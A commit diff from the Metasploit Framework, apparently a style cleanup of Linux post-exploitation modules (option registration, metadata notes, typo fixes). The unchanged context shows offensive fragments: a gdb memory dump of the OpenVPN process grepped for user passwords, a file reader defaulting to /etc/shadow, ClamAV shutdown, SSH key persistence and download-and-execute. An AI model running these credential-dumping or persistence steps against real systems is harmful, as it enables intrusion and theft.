rapid7 · bcoles · May 2, 2025
diff --git a/modules/post/linux/dos/xen_420_dos.rb b/modules/post/linux/dos/xen_420_dos.rb
@@ -26,20 +26,23 @@ def initialize(info = {})
         ],
         'Platform' => [ 'linux' ],
         'Arch' => [ARCH_X64],
-        'SessionTypes' => ['shell']
+        'SessionTypes' => ['shell'],
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
       )
     )
 
-    register_options(
-      [
-        OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
-      ], self.class
-    )
+    register_options([
+      OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])
+    ])
   end
 
   def run
     # Variables
-    @rand_folder = '/' + Rex::Text.rand_text_alpha(rand(7..11)).to_s
+    @rand_folder = '/' + Rex::Text.rand_text_alpha(7..11).to_s
     @writeable_folder = datastore['WritableDir'].to_s + @rand_folder
 
     # Testing requirements
@@ -175,7 +178,7 @@ def right_xen_version?
   ##
 
   def write_files
-    @c_name = Rex::Text.rand_text_alpha(rand(7..11)).to_s
+    @c_name = Rex::Text.rand_text_alpha(7..11).to_s
     @c_file = "#{@writeable_folder}/#{@c_name}.c"
     @make_file = "#{@writeable_folder}/Makefile"
 

diff --git a/modules/post/linux/gather/ansible.rb b/modules/post/linux/gather/ansible.rb
@@ -36,13 +36,13 @@ def initialize(info = {})
       [
         OptString.new('ANSIBLECFG', [true, 'Ansible config file location', '']),
         OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
-      ], self.class
+      ]
     )
 
     register_advanced_options(
       [
         OptString.new('ANSIBLEINVENTORY', [true, 'Ansible-inventory executable location', '']),
-      ], self.class
+      ]
     )
   end
 

diff --git a/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb b/modules/post/linux/gather/ansible_playbook_error_message_file_reader.rb
@@ -41,13 +41,13 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('FILE', [true, 'File to read the first line of', '/etc/shadow']),
-      ], self.class
+      ]
     )
 
     register_advanced_options(
       [
         OptString.new('FULLOUTPUT', [false, 'Show the full output without cleanup', false]),
-      ], self.class
+      ]
     )
   end
 

diff --git a/modules/post/linux/gather/apache_nifi_credentials.rb b/modules/post/linux/gather/apache_nifi_credentials.rb
@@ -41,7 +41,7 @@ def initialize(info = {})
         OptString.new('NIFI_IDENTITY', [false, 'NiFi login-identity-providers.xml file', '/opt/nifi/conf/login-identity-providers.xml']),
         OptString.new('NIFI_AUTHORIZERS', [false, 'NiFi authorizers file', '/opt/nifi/conf/authorizers.xml']),
         OptInt.new('ITERATIONS', [true, 'Encryption iterations', 160_000])
-      ], self.class
+      ]
     )
   end
 

diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb
@@ -64,13 +64,14 @@ def run
     cmd << 'sed -n \'s/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p\' | '
     cmd << "while read start stop; do /usr/bin/gdb --batch-silent --silent --pid #{pid} -ex \"dump memory #{tmp_path}#{pid}-$start-$stop.dump 0x$start 0x$stop\"; done 2>/dev/null; echo $?"
     dump = cmd_exec(cmd)
-    if dump.chomp.to_i == 0
-      vprint_good('Succesfully dump.')
-    else
+
+    if dump.chomp.to_i != 0
       print_warning('Could not dump process.')
       return
     end
 
+    vprint_good('Process dumped successfully.')
+
     strings = cmd_exec("/usr/bin/strings #{tmp_path}*.dump | /bin/grep -B2 KnOQ  | /bin/grep -v KnOQ | /usr/bin/column | /usr/bin/awk '{print \"User: \"$1\"\\nPass: \"$2}'")
 
     deldump = cmd_exec("/bin/rm #{tmp_path}*.dump --force 2>/dev/null; echo $?")

diff --git a/modules/post/linux/gather/puppet.rb b/modules/post/linux/gather/puppet.rb
@@ -37,7 +37,7 @@ def initialize(info = {})
         OptBool.new('FILEBUCKET', [false, 'Gather files from filebucket', true]),
         OptString.new('PUPPET', [false, 'Puppet executable location']),
         OptString.new('FACTER', [false, 'Facter executable location'])
-      ], self.class
+      ]
     )
   end
 

diff --git a/modules/post/linux/manage/disable_clamav.rb b/modules/post/linux/manage/disable_clamav.rb
@@ -33,7 +33,7 @@ def initialize(info = {})
       [
         OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),
         OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])
-      ], self.class
+      ]
     )
   end
 

diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb
@@ -13,7 +13,7 @@ def initialize(info = {})
         info,
         'Name' => 'Linux Manage Download and Execute',
         'Description' => %q{
-          This module downloads and runs a file with bash. It first tries to uses curl as
+          This module downloads and runs a file with bash. It first tries to use curl as
           its HTTP client and then wget if it's not found. Bash found in the PATH is used
           to execute the file.
         },
@@ -22,7 +22,12 @@ def initialize(info = {})
           'Joshua D. Abraham <jabra[at]praetorian.com>',
         ],
         'Platform' => ['linux'],
-        'SessionTypes' => ['shell', 'meterpreter']
+        'SessionTypes' => ['shell', 'meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        }
       )
     )
 
@@ -39,19 +44,18 @@ def cmd_exec_vprint(cmd)
     if !output.empty?
       vprint_status(output.to_s)
     end
-    return
   end
 
   def exists_exe?(exe)
     vprint_status "Searching for #{exe} in the current $PATH..."
     path = get_env('PATH')
     if path.nil? || path.empty?
+      vprint_error('No local $PATH set!')
       return false
-      vprint_error 'No local $PATH set!'
-    else
-      vprint_status "$PATH is #{path.strip!}"
     end
 
+    vprint_status("$PATH is #{path.strip!}")
+
     path.split(':').each do |p|
       full_path = p + '/' + exe
       vprint_status "Searching for '#{full_path}' ..."

diff --git a/modules/post/linux/manage/pseudo_shell.rb b/modules/post/linux/manage/pseudo_shell.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Post
     ['shell', 'get_shell_name', 0, 'Show current SHELL'],
     ['hostname', 'get_hostname', 0, 'Show current Hostname'],
     ['ips', 'ips', 0, 'Show list of current IP addresses'],
-    ['isroot?', 'is_root?', 0, 'Show if current user has root permisions'],
+    ['isroot?', 'is_root?', 0, 'Show if current user has root permissions'],
     ['exit', '', 0, 'Exit the Pseudo-shell'],
     ['tcp_ports', 'listen_tcp_ports', 0, 'Show list of listen TCP ports'],
     ['udp_ports', 'listen_udp_ports', 0, 'Show list of listen UDP ports'],
@@ -93,10 +93,10 @@ def help
     print "Commands Help\n"
     print "==============\n"
     print "\n"
-    printf("\t%-20s%-100s\n", 'Command', 'Description')
-    printf("\t%-20s%-100s\n", '-------', '-----------')
+    print format("\t%<cmd>-20s%<description>-100s\n", cmd: 'Command', description: 'Description')
+    print format("\t%<cmd>-20s%<description>-100s\n", cmd: '-------', description: '-----------')
     HELP_COMMANDS.each do |linea|
-      printf("\t%-20s%-100s\n", linea[0], linea[3])
+      print format("\t%<cmd>-20s%<description>-100s\n", cmd: linea[0], description: linea[3])
     end
     print "\n"
   end

diff --git a/modules/post/linux/manage/sshkey_persistence.rb b/modules/post/linux/manage/sshkey_persistence.rb
@@ -26,6 +26,11 @@ def initialize(info = {})
         ],
         'Platform' => [ 'linux' ],
         'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -36,14 +41,12 @@ def initialize(info = {})
       )
     )
 
-    register_options(
-      [
-        OptString.new('USERNAME', [false, 'User to add SSH key to (Default: all users on box)' ]),
-        OptPath.new('PUBKEY', [false, 'Public Key File to use. (Default: Create a new one)' ]),
-        OptString.new('SSHD_CONFIG', [true, 'sshd_config file', '/etc/ssh/sshd_config' ]),
-        OptBool.new('CREATESSHFOLDER', [true, 'If no .ssh folder is found, create it for a user', false ])
-      ], self.class
-    )
+    register_options([
+      OptString.new('USERNAME', [false, 'User to add SSH key to (Default: all users on box)' ]),
+      OptPath.new('PUBKEY', [false, 'Public Key File to use. (Default: Create a new one)' ]),
+      OptString.new('SSHD_CONFIG', [true, 'sshd_config file', '/etc/ssh/sshd_config' ]),
+      OptBool.new('CREATESSHFOLDER', [true, 'If no .ssh folder is found, create it for a user', false ])
+    ])
   end
 
   def run
-Original file line number
+Diff line change
@@ Expand Up / @@ -33,7 +33,7 @@ def initialize(info = {}) @@
           [
             OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),
             OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])
-          ], self.class
+          ]
         )
       end
@@ Expand Down @@